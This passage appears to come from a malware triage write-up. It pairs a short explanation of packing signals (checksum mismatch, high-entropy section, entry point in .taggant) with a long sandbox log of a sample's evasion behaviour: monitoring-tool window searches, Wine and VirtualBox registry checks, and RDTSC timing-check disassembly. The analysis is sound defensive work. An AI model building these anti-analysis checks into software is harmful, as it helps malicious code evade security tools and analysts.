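Pass a path to run it against a real file; with no argument it triages the constructed sample. A stored checksum that differs from the computed one is the expected result of repacking, since packers rewrite the image without refreshing OptionalHeader.CheckSum, and Windows does not verify the field for ordinary user-mode executables, so the mismatch is a triage signal rather than a load failure. Read the entropy score together with the entry-point finding above: here the entry point sits in .taggant while the near-8.0 section is pngrdmjc, the combination that usually marks a packed image.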

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass (2 times)
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS (2 times)
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-36496)
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5950 second address: 11F595A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5C20C5AC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F595A second address: 11F5964 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5C21209552h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5964 second address: 11F596A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187D83 second address: 1187DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F5C2120954Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F5C21209556h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187DB1 second address: 1187DC1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5C20C5AC36h 0x00000008 jnl 00007F5C20C5AC36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191A4A second address: 1191A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C21209553h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9F6F second address: 11F9F74 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200154 second address: 1200162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200162 second address: 120016C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200431 second address: 1200439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200439 second address: 120043E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200855 second address: 120086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209555h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120086E second address: 120088E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop esi 0x0000000a jl 00007F5C20C5AC5Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007F5C20C5AC3Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200A32 second address: 1200A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200A36 second address: 1200A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F5C20C5AC4Dh 0x0000000c jmp 00007F5C20C5AC41h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208BBD second address: 1208BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5C21209546h 0x0000000a jmp 00007F5C21209553h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5C21209556h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208BF3 second address: 1208BF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208BF7 second address: 1208BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207E8C second address: 1207EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5C20C5AC36h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007F5C20C5AC36h 0x00000014 popad 0x00000015 jmp 00007F5C20C5AC3Fh 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5C20C5AC3Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207EC0 second address: 1207EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207EC4 second address: 1207EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208301 second address: 1208308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208308 second address: 120831E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5C20C5AC3Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12084C5 second address: 12084D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F5C21209546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12088F3 second address: 12088F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12088F9 second address: 1208917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209554h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208917 second address: 1208921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5C20C5AC36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208921 second address: 1208925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208925 second address: 1208943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F5C20C5AC36h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 js 00007F5C20C5AC3Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CD9EE second address: 11CD9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CD9F3 second address: 11CD9FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDC51 second address: 11CDC57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDC57 second address: 11CDC7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F5C20C5AC36h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDC7C second address: 11CDC82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDD9F second address: 11CDDA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDDA3 second address: 11CDDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDDAC second address: 11CDDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDF0B second address: 11CDF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209555h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDF25 second address: 11CDF4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F5C20C5AC38h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE4FA second address: 11CE500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE832 second address: 11CE836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE836 second address: 11CE83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE8E5 second address: 11CE8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE8EB second address: 11CE8F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE8F0 second address: 11CE991 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5C20C5AC45h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007F5C20C5AC44h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F5C20C5AC38h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d lea eax, dword ptr [ebp+1248337Eh] 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F5C20C5AC38h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d mov ecx, dword ptr [ebp+122D310Eh] 0x00000053 sub dword ptr [ebp+122D35A6h], esi 0x00000059 nop 0x0000005a jmp 00007F5C20C5AC44h 0x0000005f push eax 0x00000060 jg 00007F5C20C5AC40h 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE991 second address: 11CE9AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D345Ch], edi 0x0000000d lea eax, dword ptr [ebp+1248333Ah] 0x00000013 stc 0x00000014 nop 0x00000015 push ecx 0x00000016 jo 00007F5C2120954Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE9AF second address: 11CE9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE9BA second address: 11CE9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE9BE second address: 11CE9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE9C2 second address: 11B68BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F5C21209555h 0x0000000c pop eax 0x0000000d popad 0x0000000e nop 0x0000000f call dword ptr [ebp+122D216Bh] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F5C2120954Ah 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1189801 second address: 1189807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1189807 second address: 1189826 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5C21209546h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 jbe 00007F5C2120954Eh 0x0000001b push edi 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1189826 second address: 118982A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118982A second address: 1189830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C2C5 second address: 120C2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 jne 00007F5C20C5AC36h 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C58D second address: 120C599 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5C21209546h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C6E5 second address: 120C6ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C9C2 second address: 120C9CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5C21209546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C9CC second address: 120C9D8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5C20C5AC3Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C9D8 second address: 120C9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C9E1 second address: 120C9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C9E9 second address: 120CA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5C21209550h 0x0000000f jbe 00007F5C21209546h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CBA2 second address: 120CBA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CBA6 second address: 120CBCD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5C21209546h 0x00000008 jmp 00007F5C21209559h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CBCD second address: 120CBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CBD1 second address: 120CBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CBD5 second address: 120CBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CBDB second address: 120CBE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5C21209546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216A2A second address: 1216A36 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5C20C5AC36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11985C8 second address: 11985D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F5C21209546h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11985D7 second address: 11985EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC44h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215516 second address: 121553F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5C21209546h 0x0000000a jmp 00007F5C21209550h 0x0000000f je 00007F5C21209546h 0x00000015 popad 0x00000016 je 00007F5C2120954Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121553F second address: 121554B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5C20C5AC42h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121554B second address: 1215551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12156B4 second address: 12156E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5C20C5AC3Ah 0x00000008 jmp 00007F5C20C5AC45h 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007F5C20C5AC36h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12156E3 second address: 12156ED instructions: 0x00000000 rdtsc 0x00000002 js 00007F5C21209546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215C42 second address: 1215C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121600F second address: 1216013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216013 second address: 1216074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC46h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F5C20C5AC3Eh 0x00000011 push edi 0x00000012 jmp 00007F5C20C5AC40h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop edi 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pushad 0x0000001f popad 0x00000020 pop edi 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 jmp 00007F5C20C5AC48h 0x00000029 pop edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121642D second address: 1216439 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5C21209546h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216439 second address: 121645D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F5C20C5AC36h 0x0000000b pop edx 0x0000000c jbe 00007F5C20C5AC4Ch 0x00000012 jmp 00007F5C20C5AC40h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121525B second address: 121525F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121525F second address: 1215263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215263 second address: 1215269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9B3 second address: 121A9B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9B9 second address: 121A9CF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5C21209558h 0x00000008 jmp 00007F5C2120954Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9CF second address: 121A9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9D7 second address: 121A9EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C21209553h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A9EE second address: 121AA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F5C20C5AC48h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A2AA second address: 121A2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5C2120954Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A2BD second address: 121A2C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A2C3 second address: 121A2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
